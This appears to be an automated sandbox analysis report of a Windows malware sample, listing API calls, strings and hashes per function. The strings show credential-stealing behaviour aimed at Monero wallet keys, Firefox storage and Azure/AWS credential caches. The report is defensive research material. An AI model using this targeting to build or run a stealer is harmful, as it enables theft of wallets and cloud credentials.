                              • API String ID:
                              • Opcode ID: 251fac4c3f79ddb8211a8796b5758c2ca7d15f8ee0860448886f50d57edda100
                              • Instruction ID: a81a08ae3b2a46990787632a4467201449b0be9e25814ab6a3bd17bd2e1e06d2
                              • Opcode Fuzzy Hash: 251fac4c3f79ddb8211a8796b5758c2ca7d15f8ee0860448886f50d57edda100
                              • Instruction Fuzzy Hash: FF31D3B3A086189FE3106E19DC857AAB7D1EF94324F1B493CDBD497340EA359C0586D6
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 003A8636
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A866D
                              • lstrcpy.KERNEL32(?,00000000), ref: 003A86AA
                              • StrStrA.SHLWAPI(?,00F2F208), ref: 003A86CF
                              • lstrcpyn.KERNEL32(005C93D0,?,00000000), ref: 003A86EE
                              • lstrlen.KERNEL32(?), ref: 003A8701
                              • wsprintfA.USER32 ref: 003A8711
                              • lstrcpy.KERNEL32(?,?), ref: 003A8727
                              • StrStrA.SHLWAPI(?,00F2F250), ref: 003A8754
                              • lstrcpy.KERNEL32(?,005C93D0), ref: 003A87B4
                              • StrStrA.SHLWAPI(?,00F2F6A0), ref: 003A87E1
                              • lstrcpyn.KERNEL32(005C93D0,?,00000000), ref: 003A8800
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                              • String ID: %s%s
                              • API String ID: 2672039231-3252725368
                              • Opcode ID: 10207785f857b04fccb619df14b93f5de486f2a7e235c1575e46ec5bd5440cd5
                              • Instruction ID: 03472affe7267e2ab047268756401c95107bc31b0c1201204053414875f17438
                              • Opcode Fuzzy Hash: 10207785f857b04fccb619df14b93f5de486f2a7e235c1575e46ec5bd5440cd5
                              • Instruction Fuzzy Hash: 0CF18A72901914EFCB11DB64DC4CEEABBB9EF98700F154599E90AE7250DF34AE04DBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391F9F
                              • lstrlen.KERNEL32(00F28A28), ref: 00391FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00391FE3
                              • lstrlen.KERNEL32(003C1794), ref: 00391FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039200E
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00392042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039204D
                              • lstrlen.KERNEL32(003C1794), ref: 00392058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392075
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00392081
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003920AC
                              • lstrlen.KERNEL32(?), ref: 003920E4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392104
                              • lstrcat.KERNEL32(00000000,?), ref: 00392112
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392139
                              • lstrlen.KERNEL32(003C1794), ref: 0039214B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039216B
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00392177
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039219D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003921A8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003921D4
                              • lstrlen.KERNEL32(?), ref: 003921EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039220A
                              • lstrcat.KERNEL32(00000000,?), ref: 00392218
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392242
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039227F
                              • lstrlen.KERNEL32(00F2DB70), ref: 0039228D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003922B1
                              • lstrcat.KERNEL32(00000000,00F2DB70), ref: 003922B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003922F7
                              • lstrcat.KERNEL32(00000000), ref: 00392304
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039232D
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00392356
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392382
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003923BF
                              • DeleteFileA.KERNEL32(00000000), ref: 003923F7
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00392444
                              • FindClose.KERNEL32(00000000), ref: 00392453
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                              • String ID:
                              • API String ID: 2857443207-0
                              • Opcode ID: 686b69bb301db33f2d85faf8815b1d22918a3ea316c91b6261cd50fe22667137
                              • Instruction ID: bba002bf48f904ab308eb435ee1a42b1797e84568372b59ff6f86191c2871f1a
                              • Opcode Fuzzy Hash: 686b69bb301db33f2d85faf8815b1d22918a3ea316c91b6261cd50fe22667137
                              • Instruction Fuzzy Hash: 3EE12C31A12A1AAFCF22EF64DD89EAF77B9AF14300F054164F805AB211DB34DD15CBA4
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6445
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A6480
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003A64AA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A64E1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6506
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A650E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A6537
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID: \..\
                              • API String ID: 2938889746-4220915743
                              • Opcode ID: ae73a325043e89da3d9501e29da5395ee789cf0b0079fe6b64dfcf792ebca7a7
                              • Instruction ID: e1de29a1f503c60b47dce7f607f165c02dc45e4ff2b8c993a57543d61ca1aede
                              • Opcode Fuzzy Hash: ae73a325043e89da3d9501e29da5395ee789cf0b0079fe6b64dfcf792ebca7a7
                              • Instruction Fuzzy Hash: 21F19D71D11A06AFCB23AF69D84AAAF77B8EF45300F094168F855DB251DB38DC45CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A43A3
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A43D6
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A43FE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4409
                              • lstrlen.KERNEL32(\storage\default\), ref: 003A4414
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4431
                              • lstrcat.KERNEL32(00000000,\storage\default\), ref: 003A443D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4466
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4471
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4498
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A44D7
                              • lstrcat.KERNEL32(00000000,?), ref: 003A44DF
                              • lstrlen.KERNEL32(003C1794), ref: 003A44EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4507
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A4513
                              • lstrlen.KERNEL32(.metadata-v2), ref: 003A451E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A453B
                              • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 003A4547
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A456E
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A45A0
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003A45A7
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4601
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A462A
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A4653
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A467B
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A46AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                              • String ID: .metadata-v2$\storage\default\
                              • API String ID: 1033685851-762053450
                              • Opcode ID: 988ff3f0d161dc792a259c459f6b2c0352799c25ff8f166453647ccb9986862b
                              • Instruction ID: b612fca88207ac1939a204a2fd522381a26d070bccf18edf98686be410cce8ee
                              • Opcode Fuzzy Hash: 988ff3f0d161dc792a259c459f6b2c0352799c25ff8f166453647ccb9986862b
                              • Instruction Fuzzy Hash: E7B16D31A12A06AFCF23EF75D94AAAF77A8EF56300F051128F845EB251DB74DC158B90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A57D5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003A5804
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5835
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A585D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A5868
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5890
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A58C8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A58D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A58F8
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A592E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5956
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A5961
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5988
                              • lstrlen.KERNEL32(003C1794), ref: 003A599A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A59B9
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A59C5
                              • lstrlen.KERNEL32(00F2DA98), ref: 003A59D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A59F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A5A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5A2C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5A58
                              • GetFileAttributesA.KERNEL32(00000000), ref: 003A5A5F
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5AB7
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5B2D
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5B56
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5B89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5BB5
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A5BEF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A5C4C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A5C70
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2428362635-0
                              • Opcode ID: 3107ff301a916e4ffb7860e56a89d93a99c926740e83ef3df026faa32331353f
                              • Instruction ID: 4c59041c4428abdc6e766f7c102fad1528d5a9b7ae12e82c977884c95f4025f1
                              • Opcode Fuzzy Hash: 3107ff301a916e4ffb7860e56a89d93a99c926740e83ef3df026faa32331353f
                              • Instruction Fuzzy Hash: 89029071A12A06AFCB23EF68D889AAF77B9EF55300F054128F845EB251DB34DD45CB90
                              APIs
                                • Part of subcall function 00391120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00391135
                                • Part of subcall function 00391120: RtlAllocateHeap.NTDLL(00000000), ref: 0039113C
                                • Part of subcall function 00391120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00391159
                                • Part of subcall function 00391120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
                                • Part of subcall function 00391120: RegCloseKey.ADVAPI32(?), ref: 0039117D
                              • lstrcat.KERNEL32(?,00000000), ref: 003911C0
                              • lstrlen.KERNEL32(?), ref: 003911CD
                              • lstrcat.KERNEL32(?,.keys), ref: 003911E8
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039121F
                              • lstrlen.KERNEL32(00F28A28), ref: 0039122D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391251
                              • lstrcat.KERNEL32(00000000,00F28A28), ref: 00391259
                              • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00391264
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391288
                              • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00391294
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003912BA
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003912FF
                              • lstrlen.KERNEL32(00F2DB70), ref: 0039130E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391335
                              • lstrcat.KERNEL32(00000000,?), ref: 0039133D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391378
                              • lstrcat.KERNEL32(00000000), ref: 00391385
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003913AC
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 003913D5
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391401
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039143D
                                • Part of subcall function 003AEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003AEE12
                              • DeleteFileA.KERNEL32(?), ref: 00391471
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                              • String ID: .keys$\Monero\wallet.keys
                              • API String ID: 2881711868-3586502688
                              • Opcode ID: ea188cdadf7e6a9a73c2dcfe4e7435274cdd9d632100bc0ec4254136ac5a36a5
                              • Instruction ID: debb716ded5de695941ccafe509066239b9efd5b92d674e4b81c90fc4a70a87b
                              • Opcode Fuzzy Hash: ea188cdadf7e6a9a73c2dcfe4e7435274cdd9d632100bc0ec4254136ac5a36a5
                              • Instruction Fuzzy Hash: 07A17E72A11A06ABCF22EFA4DC8AEAF77B9AF54300F050464F945EB251DB30DD15CB94
                              APIs
                              • memset.MSVCRT ref: 003AE740
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003AE769
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE79F
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE7AD
                              • lstrcat.KERNEL32(?,\.azure\), ref: 003AE7C6
                              • memset.MSVCRT ref: 003AE805
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003AE82D
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE85F
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE86D
                              • lstrcat.KERNEL32(?,\.aws\), ref: 003AE886
                              • memset.MSVCRT ref: 003AE8C5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003AE8F1
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AE920
                              • lstrcat.KERNEL32(?,00000000), ref: 003AE92E
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003AE947
                              • memset.MSVCRT ref: 003AE986
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$memset$FolderPathlstrcpy
                              • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 4067350539-3645552435
                              • Opcode ID: ac06b2a5a156d48fb92d739cad26bee3c7695aab2b3de20ff1d6e5cef14633de
                              • Instruction ID: 82d5d559044260f80762c620e674e4e18664446286c09202a024acc30823f12e
                              • Opcode Fuzzy Hash: ac06b2a5a156d48fb92d739cad26bee3c7695aab2b3de20ff1d6e5cef14633de
                              • Instruction Fuzzy Hash: 9671C771A50619AFDB22EB64DC4AFEE7774EF58700F010498F719AB181DF709E888B94
                              APIs
                              • lstrcpy.KERNEL32 ref: 003AABCF
                              • lstrlen.KERNEL32(00F2F388), ref: 003AABE5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AAC0D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003AAC18
